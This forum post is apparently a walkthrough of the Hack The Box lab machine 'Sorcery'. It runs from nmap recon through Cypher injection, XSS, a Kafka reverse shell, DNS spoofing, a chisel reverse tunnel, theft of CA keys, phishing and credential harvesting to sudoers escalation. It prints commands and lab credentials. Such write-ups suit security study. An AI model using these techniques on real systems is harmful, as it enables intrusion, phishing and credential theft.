Hax Forums

    Hack The Box - Season 8 - HTB Sorcery - Insane Walkthrough

      Posted by lIlIlIlIIIIlllIllI (last edited by lIlIlIlIIIIlllIllI)

      Step 1: Recon / Enumeration

      • Run nmap:

        nmap -T4 -vv -sC -sV -oN nmap/initial 10.129.161.83
        
      • Discovered open ports:

        • 22/tcp -> SSH (OpenSSH 9.6p1)
        • 443/tcp -> HTTPS (nginx/1.27.1)

      Step 2: Web Enumeration

      • Access main website:

        https://sorcery.htb/auth/login
        
      • Discover Git server:

        https://git.sorcery.htb
        
      • Clone repository:

        GIT_SSL_NO_VERIFY=true git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git
        

      Step 3: Register User

      • Register at:

        https://sorcery.htb/auth/register
        

      Step 4: Cypher Injection for Registration Key

      • Inject Cypher query to extract registration key:

        https://sorcery.htb/dashboard/store/88b6b6c5...%2F%2F
        
      • Found registration key:

        dd05d743-b560-45dc-9a09-43ab18c7a513
        
      • Register as seller using this key

      Step 5: XSS to Extract Admin Passkey

      • Access:

        https://sorcery.htb/dashboard/new-product
        
      • Trigger XSS to extract admin credentials

      Step 6: Cypher Injection to Reset Admin Password

      • Inject payload:

        https://sorcery.htb/dashboard/store/...%2F%2F
        
      • Admin password set to:

        haxforums
        

      Step 7: Login with Passkey

      • Use WebDevAuthn extension
      • Login using Passkey: admin

      Step 8: Kafka Exploitation

      • Setup Kafka via docker-compose

      • Extract topic from main.rs: update

      • Send reverse shell payload via Kafka:

        python3 exploit_kafka.py
        
      • Monitor traffic in Wireshark (Loopback)

      Step 9: DNS Spoofing

      • Modify /dns/hosts-user

        echo '10.10.15.11 pain.sorcery.htb' >> /dns/hosts-user
        ./convert.sh
        pkill -9 dnsmasq
        

      Step 10: Chisel Tunnel for Proxy

      • Serve chisel binary:

        python3 -m http.server 80
        
      • Start client:

        ./chisel client 10.10.15.11:5555 R:socks
        
      • Start server:

        ./chisel_arm server --port 5555 --reverse --socks5
        

      Step 11: Download RootCA and Sign Certificate

      • Use proxychains to download RootCA:

        curl ftp://172.19.0.2/pub/RootCA.key
        curl ftp://172.19.0.2/pub/RootCA.crt
        
      • Sign cert and start mitmproxy:

        mitmproxy --mode reverse:https://git.sorcery.htb ...
        

      Step 12: Phishing via Mail

      • Send phishing mail to tom_summers

        swaks --to [email protected] --data "..."
        
      • Retrieve credentials:

        tom_summers : jNsMKQ6k2.XDMPu.
        

      Step 13: Extract Screenshot & OCR

      • Get screen dump:

        wget http://10.10.11.71:2004/Xvfb_screen0
        mv Xvfb_screen0 text.xwd
        convert text.xwd text.png
        tesseract text.png output
        cat output.txt
        
      • Found creds:

        tom_summers_admin : dWpuk7cesBjT-
        

      Step 14: Privilege Escalation with Strace

      • Run trace.sh to monitor docker login

      • Trigger docker login:

        sudo -u rebecca_smith /usr/bin/docker login
        
      • Extracted creds:

        rebecca_smith : -7eAZDp9-f9mg
        

      Step 15: Use Proxy to Extract Docker Blob

      • Use proxychains:

        curl -u 'rebecca_smith:...' http://127.0.0.1:5000/...
        
      • Found creds:

        donna_adams : 3FEVPCT_c3xDH
        ash_winter : w@LoiU8Crmdep
        

      Step 16: Root Privileges

      • SSH into ash_winter

      • Add to sudoers via ipa commands:

        ipa group-add-member sysadmins --users=ash_winter
        ipa sudorule-add-user allow_sudo --users=ash_winter
        sudo /usr/bin/systemctl restart sssd
        
      • Become root:

        sudo su
        cat /root/root.txt
        